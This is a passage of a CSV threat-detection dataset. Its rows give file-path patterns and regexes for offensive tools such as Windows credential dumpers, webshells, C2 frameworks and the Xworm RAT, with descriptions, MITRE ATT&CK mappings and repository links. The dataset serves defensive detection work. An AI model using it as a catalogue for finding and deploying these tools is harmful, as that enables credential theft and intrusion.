Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce-beta.zip*",".{0,1000}\/wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wcreddump.git*",".{0,1000}\/wcreddump\.git.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/wcreddump.py*",".{0,1000}\/wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/wdb-version.nse*",".{0,1000}\/wdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/WDExclusion.dll*",".{0,1000}\/WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/WDExtract.git*",".{0,1000}\/WDExtract\.git.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*/wdextract32.exe*",".{0,1000}\/wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract64.exe*",".{0,1000}\/wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdigest.py*",".{0,1000}\/wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WdToggle.c*",".{0,1000}\/WdToggle\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/WdToggle.h*",".{0,1000}\/WdToggle\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/weakpass.git*",".{0,1000}\/weakpass\.git.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/weakpass_2a.gz*",".{0,1000}\/weakpass_2a\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/weakpass_3a.7z*",".{0,1000}\/weakpass_3a\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/Web/decouverte.txt*",".{0,1000}\/Web\/decouverte\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/Web/discovery.txt*",".{0,1000}\/Web\/discovery\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/web/pwn.html*",".{0,1000}\/web\/pwn\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/web_delivery.py*",".{0,1000}\/web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/web_rce.py*",".{0,1000}\/web_rce\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/WebC2.cs*",".{0,1000}\/WebC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/webdav.py*",".{0,1000}\/webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WebDavC2.git*",".{0,1000}\/WebDavC2\.git.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*/webdavshare/potato.local*",".{0,1000}\/webdavshare\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/web-hacking-toolkit*",".{0,1000}\/web\-hacking\-toolkit.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*/weblistener.py*",".{0,1000}\/weblistener\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/weblogic-t3-info.nse*",".{0,1000}\/weblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/webshell.py*",".{0,1000}\/webshell\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/webshell/*.aspx*",".{0,1000}\/webshell\/.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshell/*.jsp*",".{0,1000}\/webshell\/.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshell/*.php*",".{0,1000}\/webshell\/.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshells/shell.aspx*",".{0,1000}\/webshells\/shell\.aspx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/webshells/shell.php*",".{0,1000}\/webshells\/shell\.php.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/WebSocketC2.cs*",".{0,1000}\/WebSocketC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/Weevely*",".{0,1000}\/Weevely.{0,1000}","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","47","111","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z" "*/Weevely3*",".{0,1000}\/Weevely3.{0,1000}","offensive_tool_keyword","Weevely3","Weaponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","3071","596","2024-04-29T15:21:59Z","2014-09-20T10:16:49Z" "*/well_known_sids.py*",".{0,1000}\/well_known_sids\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other and how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*/WerTrigger.git*",".{0,1000}\/WerTrigger\.git.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*/WfpTokenDup.exe*",".{0,1000}\/WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/whatlicense.git*",".{0,1000}\/whatlicense\.git.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*/WheresMyImplant/*",".{0,1000}\/WheresMyImplant\/.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/whoami.py*",".{0,1000}\/whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WhoAmI.task*",".{0,1000}\/WhoAmI\.task.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/whois-domain.nse*",".{0,1000}\/whois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/whois-ip.nse*",".{0,1000}\/whois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Widgets/LootWidget.*",".{0,1000}\/Widgets\/LootWidget\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/wifi_hopping.*",".{0,1000}\/wifi_hopping\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/WiFiBroot*",".{0,1000}\/WiFiBroot.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. 
Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*/wifidump.c*",".{0,1000}\/wifidump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/WifiKeys.dll*",".{0,1000}\/WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - 
